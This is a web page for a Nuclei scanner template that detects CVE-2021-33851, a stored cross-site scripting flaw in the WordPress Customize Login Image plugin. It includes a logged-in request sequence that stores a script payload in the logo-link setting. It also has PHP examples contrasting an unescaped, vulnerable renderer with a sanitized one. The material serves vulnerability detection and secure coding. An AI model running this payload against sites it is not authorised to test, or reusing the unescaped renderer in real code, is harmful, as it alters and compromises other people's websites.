WordPress Customize Login Image <3.5.3 - Cross-Site Scripting
ID: CVE-2021-33851
Severity: medium
Author: 8authur
Tags: cve,cve2021,wpscan,wordpress,customize-login-image,wp,authenticated,wp-plugin,xss,apasionados
Description
WordPress Customize Login Image plugin prior to 3.5.3 contains a cross-site scripting vulnerability via the custom logo link on the Settings page. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks.
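As an added illustration, not the plugin's own code, here is a hypothetical pair of renderers for a stored logo-link option: the first prints the option verbatim, which is the pattern behind a stored XSS of this kind, the second registers a sanitize_callback so non-URL values never reach the database and escapes for the output context. Function names prefixed cli_demo_ are assumed; the option name cli_logo_url and the settings group are the ones the template's update request uses.

```php
<?php
// Hypothetical illustration, not the plugin's code: a plugin setting that
// holds a logo link URL and is rendered into the login page markup.

// Vulnerable pattern: the stored option is trusted and printed as-is, so a
// value such as <script>alert(document.domain)</script> reaches every
// visitor of wp-login.php verbatim.
function cli_demo_render_logo_link_unsafe() {
    $url = get_option( 'cli_logo_url', '' );
    echo '<h1><a href="' . $url . '">Go to ' . $url . '</a></h1>';
}

// Hardened pattern, step 1: validate on save. The sanitize_callback runs
// whenever options.php updates the setting, and esc_url_raw() strips
// characters that cannot appear in a URL, so markup is never stored.
function cli_demo_register_setting() {
    register_setting(
        'customize-login-image-settings-group',
        'cli_logo_url',
        array(
            'type'              => 'string',
            'sanitize_callback' => 'esc_url_raw',
            'default'           => '',
        )
    );
}
add_action( 'admin_init', 'cli_demo_register_setting' );

// Hardened pattern, step 2: escape on output for the context the value
// lands in: esc_url() for the href attribute, esc_html() for the link text.
// Even a value that slipped past sanitization is rendered inert.
function cli_demo_render_logo_link_safe() {
    $url = get_option( 'cli_logo_url', '' );
    if ( '' === $url ) {
        return;
    }
    printf(
        '<h1><a href="%s">Go to %s</a></h1>',
        esc_url( $url ),
        esc_html( $url )
    );
}
```

Sanitizing on save and escaping on output are independent layers; the second is what keeps a value already in the database (stored before the fix) from executing.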
YAML Source
id: CVE-2021-33851

info:
  name: WordPress Customize Login Image <3.5.3 - Cross-Site Scripting
  author: 8authur
  severity: medium
  description: |
    WordPress Customize Login Image plugin prior to 3.5.3 contains a cross-site scripting vulnerability via the custom logo link on the Settings page. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks.
  impact: |
    Successful exploitation of this vulnerability could lead to cross-site scripting (XSS) attacks, allowing an attacker to execute malicious scripts in the context of the victim's browser.
  remediation: |
    Update to the latest version of the WordPress Customize Login Image plugin (3.5.3) to mitigate the vulnerability.
  reference:
    - https://wpscan.com/vulnerability/c67753fb-9111-453e-951f-854c6ce31203
    - https://cybersecurityworks.com/zerodays/cve-2021-33851-stored-cross-site-scripting-in-wordpress-customize-login-image.html
    - https://wordpress.org/plugins/customize-login-image/
    - https://nvd.nist.gov/vuln/detail/cve-2021-33851
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2021-33851
    cwe-id: CWE-79
    epss-score: 0.00069
    epss-percentile: 0.29862
    cpe: cpe:2.3:a:apasionados:customize_login_image:3.4:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: apasionados
    product: customize_login_image
    framework: wordpress
  tags: cve,cve2021,wpscan,wordpress,customize-login-image,wp,authenticated,wp-plugin,xss,apasionados

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/options-general.php?page=customize-login-image/customize-login-image-options.php HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /wp-admin/options.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        option_page=customize-login-image-settings-group&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dcustomize-login-image%252Fcustomize-login-image-options.php%26settings-updated%3Dtrue&cli_logo_url=<script>alert(document.domain)</script>&cli_logo_file=&cli_login_background_color=&cli_custom_css=
      - |
        GET /wp-login.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_4 == 200'
          - 'contains(header_4, "text/html")'
          - 'contains(body_4, "Go to <script>alert(document.domain)</script>")'
        condition: and

    extractors:
      - type: regex
        name: nonce
        group: 1
        regex:
          - 'name="_wpnonce" value="([0-9a-zA-Z]+)"'
        internal: true
        part: body
# digest: 4a0a00473045022069b2771009caeecf24cb0b56d979aac6946cf0a75d670423366e81fc280100ad022100def4befea815615d4c412e4b7057fb16d8431d0a87a8997c13ccf2df80c62a20:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-33851.yaml"